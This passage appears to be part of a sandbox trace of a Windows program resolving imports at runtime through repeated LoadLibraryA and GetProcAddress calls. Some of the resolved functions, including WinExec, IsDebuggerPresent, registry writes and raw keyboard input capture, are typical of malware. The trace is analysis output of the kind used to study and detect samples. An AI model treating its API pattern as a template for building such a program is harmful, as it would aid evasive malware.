lpProcName="ActivateKeyboardLayout") returned 0x76278203 [0281.375] IsBadReadPtr (lp=0x6214078, ucb=0x14) returned 0 [0281.375] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x76010000 [0281.376] GetProcAddress (hModule=0x76010000, lpProcName="UnrealizeObject") returned 0x7601fb63 [0281.376] GetProcAddress (hModule=0x76010000, lpProcName="StretchBlt") returned 0x7601f467 [0281.377] GetProcAddress (hModule=0x76010000, lpProcName="SetWindowOrgEx") returned 0x76018546 [0281.377] GetProcAddress (hModule=0x76010000, lpProcName="SetWinMetaFileBits") returned 0x7604d957 [0281.377] GetProcAddress (hModule=0x76010000, lpProcName="SetViewportOrgEx") returned 0x7601834f [0281.378] GetProcAddress (hModule=0x76010000, lpProcName="SetTextColor") returned 0x76016906 [0281.378] GetProcAddress (hModule=0x76010000, lpProcName="SetStretchBltMode") returned 0x76017705 [0281.378] GetProcAddress (hModule=0x76010000, lpProcName="SetROP2") returned 0x7601f9e0 [0281.379] GetProcAddress (hModule=0x76010000, lpProcName="SetPixel") returned 0x760314f3 [0281.379] GetProcAddress (hModule=0x76010000, lpProcName="SetMapMode") returned 0x7601efbf [0281.379] GetProcAddress (hModule=0x76010000, lpProcName="SetEnhMetaFileBits") returned 0x7602b380 [0281.380] GetProcAddress (hModule=0x76010000, lpProcName="SetDIBits") returned 0x7601a995 [0281.380] GetProcAddress (hModule=0x76010000, lpProcName="SetDIBColorTable") returned 0x76031492 [0281.380] GetProcAddress (hModule=0x76010000, lpProcName="SetBrushOrgEx") returned 0x7601c4c5 [0281.381] GetProcAddress (hModule=0x76010000, lpProcName="SetBkMode") returned 0x760169b1 [0281.381] GetProcAddress (hModule=0x76010000, lpProcName="SetBkColor") returned 0x76016a3c [0281.381] GetProcAddress (hModule=0x76010000, lpProcName="SelectPalette") returned 0x7601a1f6 [0281.382] GetProcAddress (hModule=0x76010000, lpProcName="SelectObject") returned 0x76016640 [0281.382] GetProcAddress (hModule=0x76010000, lpProcName="SaveDC") returned 0x7601a74b [0281.383] GetProcAddress (hModule=0x76010000, lpProcName="RoundRect") returned 0x7603016d [0281.383] GetProcAddress (hModule=0x76010000, lpProcName="RestoreDC") returned 0x7601a67b [0281.383] GetProcAddress (hModule=0x76010000, lpProcName="Rectangle") returned 0x7601f1ff [0281.384] GetProcAddress (hModule=0x76010000, lpProcName="RectVisible") returned 0x76018f13 [0281.384] GetProcAddress (hModule=0x76010000, lpProcName="RealizePalette") returned 0x7601ef91 [0281.384] GetProcAddress (hModule=0x76010000, lpProcName="Polyline") returned 0x760205cf [0281.385] GetProcAddress (hModule=0x76010000, lpProcName="Polygon") returned 0x7601fb87 [0281.385] GetProcAddress (hModule=0x76010000, lpProcName="PolyBezierTo") returned 0x76046c25 [0281.385] GetProcAddress (hModule=0x76010000, lpProcName="PolyBezier") returned 0x76046b03 [0281.386] GetProcAddress (hModule=0x76010000, lpProcName="PlayEnhMetaFile") returned 0x7602990d [0281.386] GetProcAddress (hModule=0x76010000, lpProcName="Pie") returned 0x7604569f [0281.387] GetProcAddress (hModule=0x76010000, lpProcName="PatBlt") returned 0x760162af [0281.387] GetProcAddress (hModule=0x76010000, lpProcName="MoveToEx") returned 0x76018c21 [0281.387] GetProcAddress (hModule=0x76010000, lpProcName="MaskBlt") returned 0x7601c7ad [0281.388] GetProcAddress (hModule=0x76010000, lpProcName="LineTo") returned 0x7601f59b [0281.388] GetProcAddress (hModule=0x76010000, lpProcName="LPtoDP") returned 0x76018484 [0281.389] GetProcAddress (hModule=0x76010000, lpProcName="IntersectClipRect") returned 0x76017dfe [0281.389] GetProcAddress (hModule=0x76010000, lpProcName="GetWindowOrgEx") returned 0x7601d1bf [0281.389] GetProcAddress (hModule=0x76010000, lpProcName="GetWinMetaFileBits") returned 0x7604d7cb [0281.390] GetProcAddress (hModule=0x76010000, lpProcName="GetTextMetricsW") returned 0x76017b8f [0281.390] GetProcAddress (hModule=0x76010000, lpProcName="GetTextExtentPointW") returned 0x7601b358 [0281.390] GetProcAddress (hModule=0x76010000, lpProcName="GetTextExtentPoint32W") returned 0x7601b4b5 [0281.391] GetProcAddress (hModule=0x76010000, lpProcName="GetSystemPaletteEntries") returned 0x7601c2e1 [0281.391] GetProcAddress (hModule=0x76010000, lpProcName="GetStockObject") returned 0x76015ddf [0281.391] GetProcAddress (hModule=0x76010000, lpProcName="GetRgnBox") returned 0x7601621f [0281.392] GetProcAddress (hModule=0x76010000, lpProcName="GetPixel") returned 0x7601c3d5 [0281.392] GetProcAddress (hModule=0x76010000, lpProcName="GetPaletteEntries") returned 0x7601c2aa [0281.392] GetProcAddress (hModule=0x76010000, lpProcName="GetObjectW") returned 0x76017568 [0281.393] GetProcAddress (hModule=0x76010000, lpProcName="GetEnhMetaFilePaletteEntries") returned 0x7604d1ac [0281.393] GetProcAddress (hModule=0x76010000, lpProcName="GetEnhMetaFileHeader") returned 0x7602cd3a [0281.393] GetProcAddress (hModule=0x76010000, lpProcName="GetEnhMetaFileDescriptionW") returned 0x7604dc6b [0281.394] GetProcAddress (hModule=0x76010000, lpProcName="GetEnhMetaFileBits") returned 0x7602cdc8 [0281.394] GetProcAddress (hModule=0x76010000, lpProcName="GetDeviceCaps") returned 0x76016f7f [0281.395] GetProcAddress (hModule=0x76010000, lpProcName="GetDIBits") returned 0x7601a23b [0281.395] GetProcAddress (hModule=0x76010000, lpProcName="GetDIBColorTable") returned 0x7601a149 [0281.395] GetProcAddress (hModule=0x76010000, lpProcName="GetCurrentPositionEx") returned 0x76018d78 [0281.396] GetProcAddress (hModule=0x76010000, lpProcName="GetClipBox") returned 0x76018525 [0281.396] GetProcAddress (hModule=0x76010000, lpProcName="GetBrushOrgEx") returned 0x7601c943 [0281.396] GetProcAddress (hModule=0x76010000, lpProcName="GetBitmapBits") returned 0x7601c1ba [0281.397] GetProcAddress (hModule=0x76010000, lpProcName="GdiFlush") returned 0x76015fe4 [0281.397] GetProcAddress (hModule=0x76010000, lpProcName="FrameRgn") returned 0x76045ae2 [0281.397] GetProcAddress (hModule=0x76010000, lpProcName="ExtTextOutW") returned 0x76018192 [0281.398] GetProcAddress (hModule=0x76010000, lpProcName="ExtFloodFill") returned 0x7602fd94 [0281.398] GetProcAddress (hModule=0x76010000, lpProcName="ExcludeClipRect") returned 0x76019218 [0281.398] GetProcAddress (hModule=0x76010000, lpProcName="EnumFontFamiliesExW") returned 0x7601ce94 [0281.399] GetProcAddress (hModule=0x76010000, lpProcName="Ellipse") returned 0x760455e3 [0281.399] GetProcAddress (hModule=0x76010000, lpProcName="DeleteObject") returned 0x76015f14 [0281.399] GetProcAddress (hModule=0x76010000, lpProcName="DeleteEnhMetaFile") returned 0x7602bda2 [0281.400] GetProcAddress (hModule=0x76010000, lpProcName="DeleteDC") returned 0x76016eaa [0281.400] GetProcAddress (hModule=0x76010000, lpProcName="CreateSolidBrush") returned 0x76016b49 [0281.401] GetProcAddress (hModule=0x76010000, lpProcName="CreateRectRgn") returned 0x7601633b [0281.401] GetProcAddress (hModule=0x76010000, lpProcName="CreatePenIndirect") returned 0x7602744d [0281.401] GetProcAddress (hModule=0x76010000, lpProcName="CreatePalette") returned 0x7601b1b0 [0281.402] GetProcAddress (hModule=0x76010000, lpProcName="CreateHalftonePalette") returned 0x7601c2cd [0281.402] GetProcAddress (hModule=0x76010000, lpProcName="CreateFontIndirectW") returned 0x7601abfc [0281.402] GetProcAddress (hModule=0x76010000, lpProcName="CreateEnhMetaFileW") returned 0x7602cc1f [0281.403] GetProcAddress (hModule=0x76010000, lpProcName="CreateDIBitmap") returned 0x7601a379 [0281.403] GetProcAddress (hModule=0x76010000, lpProcName="CreateDIBSection") returned 0x76018850 [0281.404] GetProcAddress (hModule=0x76010000, lpProcName="CreateCompatibleDC") returned 0x76016888 [0281.404] GetProcAddress (hModule=0x76010000, lpProcName="CreateCompatibleBitmap") returned 0x760173ad [0281.404] GetProcAddress (hModule=0x76010000, lpProcName="CreateBrushIndirect") returned 0x7601993c [0281.405] GetProcAddress (hModule=0x76010000, lpProcName="CreateBitmap") returned 0x76016b79 [0281.405] GetProcAddress (hModule=0x76010000, lpProcName="CopyEnhMetaFileW") returned 0x7604d651 [0281.405] GetProcAddress (hModule=0x76010000, lpProcName="CombineRgn") returned 0x7601651e [0281.406] GetProcAddress (hModule=0x76010000, lpProcName="CloseEnhMetaFile") returned 0x7602c3fe [0281.406] GetProcAddress (hModule=0x76010000, lpProcName="Chord") returned 0x760454fa [0281.406] GetProcAddress (hModule=0x76010000, lpProcName="BitBlt") returned 0x760172c0 [0281.407] GetProcAddress (hModule=0x76010000, lpProcName="ArcTo") returned 0x76045436 [0281.407] GetProcAddress (hModule=0x76010000, lpProcName="Arc") returned 0x7604534e [0281.407] GetProcAddress (hModule=0x76010000, lpProcName="AngleArc") returned 0x76045299 [0281.407] IsBadReadPtr (lp=0x621408c, ucb=0x14) returned 0 [0281.407] LoadLibraryA (lpLibFileName="version.dll") returned 0x75200000 [0281.408] GetProcAddress (hModule=0x75200000, lpProcName="VerQueryValueW") returned 0x75201b51 [0281.409] GetProcAddress (hModule=0x75200000, lpProcName="GetFileVersionInfoSizeW") returned 0x752019d9 [0281.409] GetProcAddress (hModule=0x75200000, lpProcName="GetFileVersionInfoW") returned 0x752019f4 [0281.409] IsBadReadPtr (lp=0x62140a0, ucb=0x14) returned 0 [0281.409] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0281.410] GetProcAddress (hModule=0x77780000, lpProcName="WriteFile") returned 0x777d1400 [0281.410] GetProcAddress (hModule=0x77780000, lpProcName="WinExec") returned 0x7780e5fd [0281.410] GetProcAddress (hModule=0x77780000, lpProcName="WideCharToMultiByte") returned 0x777d450e [0281.411] GetProcAddress (hModule=0x77780000, lpProcName="WaitForSingleObject") returned 0x777cba90 [0281.411] GetProcAddress (hModule=0x77780000, lpProcName="WaitForMultipleObjectsEx") returned 0x777cbc00 [0281.411] GetProcAddress (hModule=0x77780000, lpProcName="VirtualQueryEx") returned 0x777b4e42 [0281.412] GetProcAddress (hModule=0x77780000, lpProcName="VirtualQuery") returned 0x777d76d6 [0281.412] GetProcAddress (hModule=0x77780000, lpProcName="VirtualProtect") returned 0x777c2341 [0281.412] GetProcAddress (hModule=0x77780000, lpProcName="VirtualFree") returned 0x777d1da4 [0281.413] GetProcAddress (hModule=0x77780000, lpProcName="VirtualAlloc") returned 0x777d2fb6 [0281.413] GetProcAddress (hModule=0x77780000, lpProcName="SwitchToThread") returned 0x777beb24 [0281.413] GetProcAddress (hModule=0x77780000, lpProcName="SuspendThread") returned 0x777e0ca9 [0281.414] GetProcAddress (hModule=0x77780000, lpProcName="Sleep") returned 0x777cba46 [0281.414] GetProcAddress (hModule=0x77780000, lpProcName="SizeofResource") returned 0x777c3e7f [0281.415] GetProcAddress (hModule=0x77780000, lpProcName="SetThreadPriority") returned 0x777c4815 [0281.415] GetProcAddress (hModule=0x77780000, lpProcName="SetThreadLocale") returned 0x777e88e6 [0281.415] GetProcAddress (hModule=0x77780000, lpProcName="SetLastError") returned 0x777cbb08 [0281.416] GetProcAddress (hModule=0x77780000, lpProcName="SetFilePointer") returned 0x777cdb36 [0281.416] GetProcAddress (hModule=0x77780000, lpProcName="SetEvent") returned 0x777cbccc [0281.416] GetProcAddress (hModule=0x77780000, lpProcName="SetErrorMode") returned 0x777d4a51 [0281.417] GetProcAddress (hModule=0x77780000, lpProcName="SetEndOfFile") returned 0x777c2319 [0281.417] GetProcAddress (hModule=0x77780000, lpProcName="ResumeThread") returned 0x777c0f1c [0281.418] GetProcAddress (hModule=0x77780000, lpProcName="ResetEvent") returned 0x777cbcb4 [0281.418] GetProcAddress (hModule=0x77780000, lpProcName="RemoveDirectoryW") returned 0x777b586a [0281.418] GetProcAddress (hModule=0x77780000, lpProcName="ReadFile") returned 0x777c96fb [0281.419] GetProcAddress (hModule=0x77780000, lpProcName="RaiseException") returned 0x777beb60 [0281.419] GetProcAddress (hModule=0x77780000, lpProcName="IsDebuggerPresent") returned 0x777c3ea8 [0281.420] GetProcAddress (hModule=0x77780000, lpProcName="OpenProcess") returned 0x777c59d7 [0281.420] GetProcAddress (hModule=0x77780000, lpProcName="MulDiv") returned 0x777cb7a0 [0281.420] GetProcAddress (hModule=0x77780000, lpProcName="LockResource") returned 0x777bfd29 [0281.421] GetProcAddress (hModule=0x77780000, lpProcName="LocalFree") returned 0x777cca64 [0281.421] GetProcAddress (hModule=0x77780000, lpProcName="LoadResource") returned 0x777c984d [0281.421] GetProcAddress (hModule=0x77780000, lpProcName="LoadLibraryW") returned 0x777d3c01 [0281.422] GetProcAddress (hModule=0x77780000, lpProcName="LeaveCriticalSection") returned 0x77ba7760 [0281.422] GetProcAddress (hModule=0x77780000, lpProcName="IsValidLocale") returned 0x777c3de4 [0281.423] GetProcAddress (hModule=0x77780000, lpProcName="InitializeCriticalSection") returned 0x77bba149 [0281.423] GetProcAddress (hModule=0x77780000, lpProcName="HeapFree") returned 0x777cbbd0 [0281.423] GetProcAddress (hModule=0x77780000, lpProcName="HeapDestroy") returned 0x777c2301 [0281.424] GetProcAddress (hModule=0x77780000, lpProcName="HeapCreate") returned 0x777d3ea2 [0281.424] GetProcAddress (hModule=0x77780000, lpProcName="HeapAlloc") returned 0x77bb2dd6 [0281.424] GetProcAddress (hModule=0x77780000, lpProcName="GlobalUnlock") returned 0x777c9d50 [0281.425] GetProcAddress (hModule=0x77780000, lpProcName="GlobalSize") returned 0x777beb78 [0281.425] GetProcAddress (hModule=0x77780000, lpProcName="GlobalLock") returned 0x777c9e05 [0281.426] GetProcAddress (hModule=0x77780000, lpProcName="GlobalFree") returned 0x777c9cf9 [0281.426] GetProcAddress (hModule=0x77780000, lpProcName="GlobalFindAtomW") returned 0x777c912d [0281.426] GetProcAddress (hModule=0x77780000, lpProcName="GlobalDeleteAtom") returned 0x777bf16c [0281.427] GetProcAddress (hModule=0x77780000, lpProcName="GlobalAlloc") returned 0x777c9ce1 [0281.427] GetProcAddress (hModule=0x77780000, lpProcName="GlobalAddAtomW") returned 0x777c70f9 [0281.427] GetProcAddress (hModule=0x77780000, lpProcName="GetVolumeInformationW") returned 0x777d7598 [0281.428] GetProcAddress (hModule=0x77780000, lpProcName="GetVersionExW") returned 0x777c3b1a [0281.428] GetProcAddress (hModule=0x77780000, lpProcName="GetVersion") returned 0x777c154e [0281.428] GetProcAddress (hModule=0x77780000, lpProcName="GetUserDefaultLCID") returned 0x777d6584 [0281.429] GetProcAddress (hModule=0x77780000, lpProcName="GetTimeZoneInformation") returned 0x777b8a3b [0281.429] GetProcAddress (hModule=0x77780000, lpProcName="GetTickCount") returned 0x777cba60 [0281.429] GetProcAddress (hModule=0x77780000, lpProcName="GetThreadPriority") returned 0x777c9147 [0281.430] GetProcAddress (hModule=0x77780000, lpProcName="GetThreadLocale") returned 0x777c153c [0281.430] GetProcAddress (hModule=0x77780000, lpProcName="GetTempPathW") returned 0x777b8b33 [0281.431] GetProcAddress (hModule=0x77780000, lpProcName="GetStdHandle") returned 0x777d1e46 [0281.431] GetProcAddress (hModule=0x77780000, lpProcName="GetProcAddress") returned 0x777d33d3 [0281.431] GetProcAddress (hModule=0x77780000, lpProcName="GetModuleHandleW") returned 0x777d374d [0281.432] GetProcAddress (hModule=0x77780000, lpProcName="GetModuleFileNameW") returned 0x777d3c26 [0281.432] GetProcAddress (hModule=0x77780000, lpProcName="GetLocaleInfoW") returned 0x777d6596 [0281.432] GetProcAddress (hModule=0x77780000, lpProcName="GetLocalTime") returned 0x777ca90e [0281.433] GetProcAddress (hModule=0x77780000, lpProcName="GetLastError") returned 0x777cbf00 [0281.433] GetProcAddress (hModule=0x77780000, lpProcName="GetFullPathNameW") returned 0x777d4543 [0281.434] GetProcAddress (hModule=0x77780000, lpProcName="GetFileSize") returned 0x777c0273 [0281.434] GetProcAddress (hModule=0x77780000, lpProcName="GetFileAttributesW") returned 0x777d64ff [0281.434] GetProcAddress (hModule=0x77780000, lpProcName="GetExitCodeThread") returned 0x777b6ddd [0281.435] GetProcAddress (hModule=0x77780000, lpProcName="GetEnvironmentVariableW") returned 0x777d65c4 [0281.435] GetProcAddress (hModule=0x77780000, lpProcName="GetDiskFreeSpaceW") returned 0x777b3530 [0281.435] GetProcAddress (hModule=0x77780000, lpProcName="GetDateFormatW") returned 0x777cafab [0281.436] GetProcAddress (hModule=0x77780000, lpProcName="GetCurrentThreadId") returned 0x777cbb80 [0281.436] GetProcAddress (hModule=0x77780000, lpProcName="GetCurrentThread") returned 0x777d3351 [0281.437] GetProcAddress (hModule=0x77780000, lpProcName="GetCurrentProcessId") returned 0x777ccac4 [0281.437] GetProcAddress (hModule=0x77780000, lpProcName="GetCurrentProcess") returned 0x777ccdcf [0281.437] GetProcAddress (hModule=0x77780000, lpProcName="GetComputerNameW") returned 0x777c03ff [0281.438] GetProcAddress (hModule=0x77780000, lpProcName="GetCPInfoExW") returned 0x777b8b1b [0281.438] GetProcAddress (hModule=0x77780000, lpProcName="GetCPInfo") returned 0x777d1e2e [0281.438] GetProcAddress (hModule=0x77780000, lpProcName="GetACP") returned 0x777d39aa [0281.439] GetProcAddress (hModule=0x77780000, lpProcName="FreeResource") returned 0x777bf1bd [0281.439] GetProcAddress (hModule=0x77780000, lpProcName="InterlockedExchange") returned 0x777cbf0a [0281.439] GetProcAddress (hModule=0x77780000, lpProcName="InterlockedCompareExchange") returned 0x777cbb92 [0281.440] GetProcAddress (hModule=0x77780000, lpProcName="FreeLibrary") returned 0x777cd9d0 [0281.440] GetProcAddress (hModule=0x77780000, lpProcName="FormatMessageW") returned 0x777c54a3 [0281.440] GetProcAddress (hModule=0x77780000, lpProcName="FindResourceW") returned 0x777c3e61 [0281.441] GetProcAddress (hModule=0x77780000, lpProcName="FindNextFileW") returned 0x777c963a [0281.441] GetProcAddress (hModule=0x77780000, lpProcName="FindFirstFileW") returned 0x777d53b2 [0281.442] GetProcAddress (hModule=0x77780000, lpProcName="FindClose") returned 0x777d0e62 [0281.442] GetProcAddress (hModule=0x77780000, lpProcName="FileTimeToLocalFileTime") returned 0x777d2004 [0281.442] GetProcAddress (hModule=0x77780000, lpProcName="FileTimeToDosDateTime") returned 0x777c2ce1 [0281.443] GetProcAddress (hModule=0x77780000, lpProcName="EnumSystemLocalesW") returned 0x7780f3df [0281.443] GetProcAddress (hModule=0x77780000, lpProcName="EnumCalendarInfoW") returned 0x7780f38f [0281.443] GetProcAddress (hModule=0x77780000, lpProcName="EnterCriticalSection") returned 0x77ba77a0 [0281.444] GetProcAddress (hModule=0x77780000, lpProcName="DeleteFileW") returned 0x777c0f62 [0281.444] GetProcAddress (hModule=0x77780000, lpProcName="DeleteCriticalSection") returned 0x77bb9ac5 [0281.444] GetProcAddress (hModule=0x77780000, lpProcName="CreateThread") returned 0x777d375d [0281.445] GetProcAddress (hModule=0x77780000, lpProcName="CreateProcessW") returned 0x7778204d [0281.445] GetProcAddress (hModule=0x77780000, lpProcName="CreateFileW") returned 0x777ccc56 [0281.445] GetProcAddress (hModule=0x77780000, lpProcName="CreateEventW") returned 0x777d3386 [0281.446] GetProcAddress (hModule=0x77780000, lpProcName="CreateDirectoryW") returned 0x777c3925 [0281.446] GetProcAddress (hModule=0x77780000, lpProcName="CompareStringW") returned 0x777c9bee [0281.447] GetProcAddress (hModule=0x77780000, lpProcName="CloseHandle") returned 0x777cca7c [0281.447] IsBadReadPtr (lp=0x62140b4, ucb=0x14) returned 0 [0281.447] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77130000 [0281.447] GetProcAddress (hModule=0x77130000, lpProcName="RegSetValueExW") returned 0x771414d6 [0281.448] GetProcAddress (hModule=0x77130000, lpProcName="RegQueryValueExW") returned 0x771446ad [0281.448] GetProcAddress (hModule=0x77130000, lpProcName="RegQueryInfoKeyW") returned 0x771446e7 [0281.448] GetProcAddress (hModule=0x77130000, lpProcName="RegOpenKeyExW") returned 0x7714468d [0281.450] GetProcAddress (hModule=0x77130000, lpProcName="RegFlushKey") returned 0x7715773f [0281.450] GetProcAddress (hModule=0x77130000, lpProcName="RegEnumKeyExW") returned 0x771446c8 [0281.450] GetProcAddress (hModule=0x77130000, lpProcName="RegCreateKeyExW") returned 0x771440fe [0281.451] GetProcAddress (hModule=0x77130000, lpProcName="RegCloseKey") returned 0x7714469d [0281.451] GetProcAddress (hModule=0x77130000, lpProcName="GetUserNameW") returned 0x7714157a [0281.451] IsBadReadPtr (lp=0x62140c8, ucb=0x14) returned 0 [0281.451] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77780000 [0281.452] GetProcAddress (hModule=0x77780000, lpProcName="Sleep") returned 0x777cba46 [0281.452] IsBadReadPtr (lp=0x62140dc, ucb=0x14) returned 0 [0281.452] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x77a00000 [0281.453] GetProcAddress (hModule=0x77a00000, lpProcName="SafeArrayPtrOfIndex") returned 0x77a1e1ce [0281.453] GetProcAddress (hModule=0x77a00000, lpProcName="SafeArrayGetUBound") returned 0x77a1e127 [0281.453] GetProcAddress (hModule=0x77a00000, lpProcName="SafeArrayGetLBound") returned 0x77a1e173 [0281.454] GetProcAddress (hModule=0x77a00000, lpProcName="SafeArrayCreate") returned 0x77a1e263 [0281.454] GetProcAddress (hModule=0x77a00000, lpProcName="VariantChangeType") returned 0x77a05dee [0281.454] GetProcAddress (hModule=0x77a00000, lpProcName="VariantCopyInd") returned 0x77a1e86c [0281.455] GetProcAddress (hModule=0x77a00000, lpProcName="VariantCopy") returned 0x77a048f1 [0281.455] GetProcAddress (hModule=0x77a00000, lpProcName="VariantClear") returned 0x77a03eae [0281.455] GetProcAddress (hModule=0x77a00000, lpProcName="VariantInit") returned 0x77a03ed5 [0281.455] IsBadReadPtr (lp=0x62140f0, ucb=0x14) returned 0 [0281.455] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x77a00000 [0281.456] GetProcAddress (hModule=0x77a00000, lpProcName="GetErrorInfo") returned 0x77a03f21 [0281.456] GetProcAddress (hModule=0x77a00000, lpProcName="GetActiveObject") returned 0x77a48f58 [0281.457] GetProcAddress (hModule=0x77a00000, lpProcName="SysFreeString") returned 0x77a03e59 [0281.457] IsBadReadPtr (lp=0x6214104, ucb=0x14) returned 0 [0281.457] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x77620000 [0281.458] GetProcAddress (hModule=0x77620000, lpProcName="CreateStreamOnHGlobal") returned 0x7764363b [0281.458] GetProcAddress (hModule=0x77620000, lpProcName="IsAccelerator") returned 0x776e043e [0281.458] GetProcAddress (hModule=0x77620000, lpProcName="OleDraw") returned 0x776a0286 [0281.459] GetProcAddress (hModule=0x77620000, lpProcName="OleSetMenuDescriptor") returned 0x7767dc53 [0281.459] GetProcAddress (hModule=0x77620000, lpProcName="OleUninitialize") returned 0x7763eba1 [0281.459] GetProcAddress (hModule=0x77620000, lpProcName="OleInitialize") returned 0x7763efd7 [0281.460] GetProcAddress (hModule=0x77620000, lpProcName="CoTaskMemFree") returned 0x77676f41 [0281.460] GetProcAddress (hModule=0x77620000, lpProcName="CoTaskMemAlloc") returned 0x7766ea4c [0281.460] GetProcAddress (hModule=0x77620000, lpProcName="ProgIDFromCLSID") returned 0x776aef82 [0281.461] GetProcAddress (hModule=0x77620000, lpProcName="StringFromCLSID") returned 0x7763eb17 [0281.461] GetProcAddress (hModule=0x77620000, lpProcName="CoCreateInstance") returned 0x77669d0b [0281.461] GetProcAddress (hModule=0x77620000, lpProcName="CoGetClassObject") returned 0x776554ad [0281.462] GetProcAddress (hModule=0x77620000, lpProcName="CoUninitialize") returned 0x776686d3 [0281.462] GetProcAddress (hModule=0x77620000, lpProcName="CoInitialize") returned 0x7763b636 [0281.462] GetProcAddress (hModule=0x77620000, lpProcName="IsEqualGUID") returned 0x776e041c [0281.463] IsBadReadPtr (lp=0x6214118, ucb=0x14) returned 0 [0281.463] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x74c90000 [0281.463] GetProcAddress (hModule=0x74c90000, lpProcName="InitializeFlatSB") returned 0x74d6f803 [0281.464] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_SetScrollProp") returned 0x74d107d0 [0281.464] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_SetScrollPos") returned 0x74d10894 [0281.464] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_SetScrollInfo") returned 0x74d108c7 [0281.474] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_GetScrollPos") returned 0x74d6f80e [0281.474] GetProcAddress (hModule=0x74c90000, lpProcName="FlatSB_GetScrollInfo") returned 0x74d108b6 [0281.474] GetProcAddress (hModule=0x74c90000, lpProcName="_TrackMouseEvent") returned 0x74d122d1 [0281.475] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_SetIconSize") returned 0x74d7b44e [0281.475] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_GetIconSize") returned 0x74ca50df [0281.475] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_Write") returned 0x74cd8b97 [0281.476] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_Read") returned 0x74c93eae [0281.476] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_GetDragImage") returned 0x74d7afbb [0281.476] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_DragShowNolock") returned 0x74d7b161 [0281.477] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_DragMove") returned 0x74d7b0f0 [0281.477] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_DragLeave") returned 0x74d7b12a [0281.478] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_DragEnter") returned 0x74d7b0b3 [0281.478] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_EndDrag") returned 0x74d7a177 [0281.478] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_BeginDrag") returned 0x74d7b021 [0281.479] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_GetIcon") returned 0x74cbaf2e [0281.479] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_Remove") returned 0x74cbe333 [0281.479] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_DrawEx") returned 0x74ca10fd [0281.480] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_Draw") returned 0x74d2c687 [0281.480] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_GetBkColor") returned 0x74cae8d2 [0281.481] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_SetBkColor") returned 0x74d10183 [0281.481] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_Add") returned 0x74ce8fa1 [0281.481] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_SetImageCount") returned 0x74ce5249 [0281.482] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_GetImageCount") returned 0x74c9a8b9 [0281.482] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_Destroy") returned 0x74ca6471 [0281.483] GetProcAddress (hModule=0x74c90000, lpProcName="ImageList_Create") returned 0x74ca3c75 [0281.483] IsBadReadPtr (lp=0x621412c, ucb=0x14) returned 0 [0281.483] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76270000 [0281.483] GetProcAddress (hModule=0x76270000, lpProcName="EnumDisplayMonitors") returned 0x762834a3 [0281.484] GetProcAddress (hModule=0x76270000, lpProcName="GetMonitorInfoW") returned 0x762833e7 [0281.484] GetProcAddress (hModule=0x76270000, lpProcName="MonitorFromPoint") returned 0x762794c9 [0281.484] GetProcAddress (hModule=0x76270000, lpProcName="MonitorFromWindow") returned 0x76283622 [0281.484] IsBadReadPtr (lp=0x6214140, ucb=0x14) returned 0 [0281.484] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x761c0000 [0281.485] GetProcAddress (hModule=0x761c0000, lpProcName="memset") returned 0x761c9790 [0281.485] GetProcAddress (hModule=0x761c0000, lpProcName="memcpy") returned 0x761c9910 [0281.486] IsBadReadPtr (lp=0x6214154, ucb=0x14) returned 0 [0281.486] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x764e0000 [0281.486] GetProcAddress (hModule=0x764e0000, lpProcName="ShellExecuteW") returned 0x764f3c71 [0281.487] GetProcAddress (hModule=0x764e0000, lpProcName="Shell_NotifyIconW") returned 0x765001c1 [0281.487] IsBadReadPtr (lp=0x6214168, ucb=0x14) returned 0 [0281.487] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x771d0000 [0281.487] GetProcAddress (hModule=0x771d0000, lpProcName="FindNextUrlCacheEntryW") returned 0x7720989c [0281.488] GetProcAddress (hModule=0x771d0000, lpProcName="FindFirstUrlCacheEntryW") returned 0x7720978a [0281.488] GetProcAddress (hModule=0x771d0000, lpProcName="FindCloseUrlCache") returned 0x77218409 [0281.488] GetProcAddress (hModule=0x771d0000, lpProcName="DeleteUrlCacheEntryW") returned 0x77229573 [0281.489] IsBadReadPtr (lp=0x621417c, ucb=0x14) returned 0 [0281.489] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76270000 [0281.489] GetProcAddress (hModule=0x76270000, lpProcName="GetRawInputData") returned 0x762d4c21 [0281.490] GetProcAddress (hModule=0x76270000, lpProcName="RegisterRawInputDevices") returned 0x76275b52 [0281.490] IsBadReadPtr (lp=0x6214190, ucb=0x14) returned 0 [0281.490] LoadLibraryA (lpLibFileName="oleacc.dll") returned 0x732a0000 [0281.490] GetProcAddress (hModule=0x732a0000, lpProcName="AccessibleObjectFromWindow") returned 0x732a2480 [0281.490] IsBadReadPtr (lp=0x62141a4, ucb=0x14) returned 0 [0281.490] LoadLibraryA (lpLibFileName="OLEACC.DLL") returned 0x732a0000 [0281.491] 